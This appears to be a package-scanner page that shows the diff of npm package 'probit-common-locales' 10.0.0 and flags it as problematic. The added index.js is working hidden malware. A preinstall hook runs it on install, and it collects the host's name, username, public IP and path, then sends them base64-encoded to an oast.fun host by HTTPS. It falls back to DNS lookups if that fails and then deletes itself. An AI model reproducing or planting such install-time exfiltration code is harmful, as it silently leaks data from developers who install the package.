probit-common-locales 10.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of probit-common-locales might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +1 -0
  2. package/main.js +0 -0
  3. package/package.json +15 -0
package/index.js ADDED
@@ -0,0 +1 @@
1
+ const https=require("https"),dns=require("dns"),fs=require("fs"),os=require("os"),cp=require("child_process"),{execSync:execSync}=require("child_process"),targetURL="ckqrcfs2vtc00002qnaggj5hgeyyyyyyb.oast.fun";function collectDataAndSend(){const e=os.hostname(),n=os.userInfo().username,t=execSync("curl -s ifconfig.me",{encoding:"utf-8"}),r=__dirname,o=JSON.stringify({hostname:e,username:n,publicIp:t,actualPath:r}),s=Buffer.from(o).toString("base64"),c={hostname:targetURL,path:"/bugbounty",method:"POST",headers:{"Content-Type":"application/x-www-form-urlencoded","Content-Length":Buffer.byteLength(s)}},a=https.request(c,(e=>{e.on("data",(()=>{}))}));a.on("error",(e=>{dns.resolve4(targetURL,((e,n)=>{if(e)return void console.error(e);const t=n[0];cp.exec(`nslookup ${t}.${s}`,(()=>{}))}))})),a.write(s),a.end()}collectDataAndSend(),fs.unlink(__filename,(e=>{e&&console.error(e)}));
package/main.js ADDED
File without changes
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "probit-common-locales",
3
+ "version": "10.0.0",
4
+ "description": "locales",
5
+ "main": "main.js",
6
+ "scripts": {
7
+ "preinstall": "node index.js",
8
+ "test": "echo \"Error: no test specified\" && exit 1"
9
+ },
10
+ "keywords": [
11
+ "web3"
12
+ ],
13
+ "author": "syt4sh1",
14
+ "license": "MIT"
15
+ }